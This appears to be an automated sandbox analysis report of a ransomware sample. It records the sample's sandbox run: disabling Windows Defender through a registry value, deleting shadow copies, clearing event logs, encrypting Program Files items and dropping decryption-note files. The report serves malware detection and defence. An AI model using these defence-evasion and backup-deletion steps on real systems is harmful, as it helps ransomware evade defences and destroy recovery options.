Analysis Overview
SHA256
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc
Threat Level: Known bad
The file 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Deletes Windows Defender Definitions
Modifies Windows Defender Real-time Protection settings
Hive
Deletes shadow copies
Clears Windows event logs
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Modifies registry class
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-10 16:44
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-10 16:44
Reported
2022-01-10 16:48
Platform
win7-en-20211208
Max time kernel
108s
Max time network
15s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_GCswj2P1ems0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00915_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_2GlJXVeCzZs0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\VCTRN_01.MID.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mMPy4xexJtM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_9B4a1o9JKrM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15034_.GIF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_F6lSp6z7mdA0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_XZRyG39WxEw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_LfvYeLAhobw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_5S6VZCzp0KQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_udLz2Ffs6AM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FEZIP.POC.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_KmcvzaPPUgU0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_HUto2gVAhC40.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\hwrdeush.dat | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_H4rUMv19Hvk0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_5oAdghcmIyw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_PLFZtvkHOLE0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\plugin.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_xdtulbQkOCM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\js\timeZones.js | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_zVveAM2WWOc0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_FA-qPTqKpX80.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0183328.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_reDjZvMBP2w0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR15F.GIF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_R5rV0GIpVrA0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_AXdKsi1SOAA0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\a84r_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_XCamJmOveyg0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mbC4VpSzT8s0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msadox28.tlb | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\js\slideShow.js | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00174_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_ZEXJ8yhoIt00.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0195534.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_0vqYk4EWeCQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_1xR5fh5p3do0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_tTSiXhhrJOY0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_yCcdDh1GoI00.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_G3fLfD2VemE0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Thatch.dotx.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_pBxcQIbp_RE0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\meta\reader\a84r_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_BNStNYOut2Q0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_SOE7ahl5eK80.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\StartDeny.scf.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_0lnxq57SPe00.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_C1fi3eE98aM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_F4d3zeQw8fw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SketchPadTestSchema.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_kiLghOIxbE40.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_IKyQDQO1aqc0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Juneau.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mdrGcVW4TiQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_EZmuCQDH0mI0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_bB3cdm6B4Vc0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN010.XML.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_Ray1VIqsaxM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBHED98.POC.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_Y_5WLahJLGA0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_--tjtl2iRWQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_M8XHMW8G0LA0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
